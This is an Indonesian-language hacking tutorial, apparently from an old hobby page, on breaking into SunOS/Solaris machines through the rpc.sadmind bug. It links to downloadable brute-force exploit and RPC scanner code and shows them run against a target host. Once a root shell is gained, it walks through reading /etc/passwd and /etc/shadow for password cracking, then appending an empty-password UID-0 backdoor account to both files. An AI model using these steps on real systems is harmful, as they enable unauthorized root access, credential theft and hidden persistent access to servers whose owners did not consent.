WIRELESS LAN sudah tidak aman lagi

Teknik Penjebolan SUN OS

Sun OS, adalah suatu OS yang tekenal handal dengan mesinnya yang seharga 2 mobil kijang tapi hal tersebut tidak serta merta menjadikan Sun OS kebal terhadap serangan-serangan juga. Berikut adalah penururan dari semutz mengenai penjebolan yang memungkinkan Sun OS dilakukan :

terus terang ajah, aku gak ngajarin loh ya, tapi cuma mo ngasih tau doang gimana cara ngedapetin box online under sunOS, bagi yang udah tau mah, tolong di koreksi, otre....!!! Dari bug rpc.sadmind telah kita ketahui sudah lama banget . Tetapi kelihatannya masih belom ada manualnya untuk mengeksploitnya. Saat ini aku mo coba untuk nerangin gimana buat nge-eksploit bug-nya. Untuk pertamanya aku nge-rekomendasiin gunain bruteforce untuk file sadmindex-sparc.c ama sadmindex-x86.c , kalian bisa dapetin bruteforce-nya di jasakom atau kalo gak imel aku ajah, atau di http://neelam.addr.com/brute-solaris.c Kalo dah dapetin file-nya coba lo compile, lalu jalanin :

./brute-solaris

Kalo kalian b'lom ngerti apa ituh coba ketik ./brute-solaris Lo bakalan tau skarang .....hieheihee.. ;-) Nah pas kalian dapetin vulnerable host (misal dengan cara scanning pake RPC-scanners LOLz), [scanner ada di http://neelam.addr.com/RPC-scanner.c atau di jasakom ada kok] kalian bisa jalanin seperti ini :

./brute-solaris 1 www.target.com

Nah misal lo skarang dah masuk ke rootshell, host ituh bisa lo apa-apain dah. Walaupun tuh host udah di patch. Ok skarang kalian dah masuk ke rootshell, kalian bisa nglakuin 2 cara yang mudah untuk meng-exploit rpc.sadmind bug. Sebenernya ada 3 cara seeh, yang satu lagih pake backdoor, tapi ituh aku bahas laen kali ajah, kita bahas yang manual dulu, lawong prinsip backdoor sama ajah kok.....hieheiheihe... Cara pertama, inih cara yang lamerz banget dahkliatannya, coba kalian view

/etc/passwd

(atau /etc/shadow tentunya) lalu di crack password file-nya gunain password-cracker seperti John The Ripper --> hihihihihi...ini akan makan waktu bertahun-tahun ....lolz ! Kalian coba view /etc/passwd seperti ini :

cat /etc/passwd;

Tanda [;] harus diikut sertakan loh .. ! Soale kalo cuma mengetikkan cat /etc/passwd server-nya bakalan ngebaca comand ituh seperti inih :

cat /etc/passwd^m

nah setelah dapet filenya, tinggal di terjemahin dah ke tukang terjemahan...hiehiehiehe... :( Ok skarang cara kedua untuk nge-exploit bug tersebut, dan aku kira lebih cepet di banding cara yang pertama tadi. Caranya kita add dua users, yang satu sebagai root tentunya ... Untuk contohnya misal pada host dengan /etc/shadow !

Coba ketik cara berikut pada rootshell :

echo er4ser:x:UID:GID:er4ser:/:/bin/sh >> /etc/passwd;

echo er4ser2:x:0:0:er4ser:/:/bin/sh >> /etc/passwd;

echo er4ser:::::: >> /etc/shadow;

echo er4ser2:::::: >> /etc/shadow;

Ingat, jangan gunakan tanda [>] dari [>>], tanda [>>] untuk menambahkan line/list, sedangkan [>] untuk overwrites ! Coba ganti UID ama GID pake 777 misal, tapi asal jangan 0 Setelah kalian ketik seperti tadi, tuh server akan meng-add dua users :

er4ser ama er4ser2

Nah coba lo login pake non-root user, semutz, dan coba su er4ser2 lalu set password buat users ... Eng..ing..eng.., skarang lo dapetin dah akses sbagai root di server ituh ... ok, slamat mencoba ajah yach...

inget, kalo udah bisa, tolong lah yang belom bisa, coz knowledge is power, share it and it will multiply...

Download/brute-solaris.c

Download/RPC-scaners.c

Hosted by www.Geocities.ws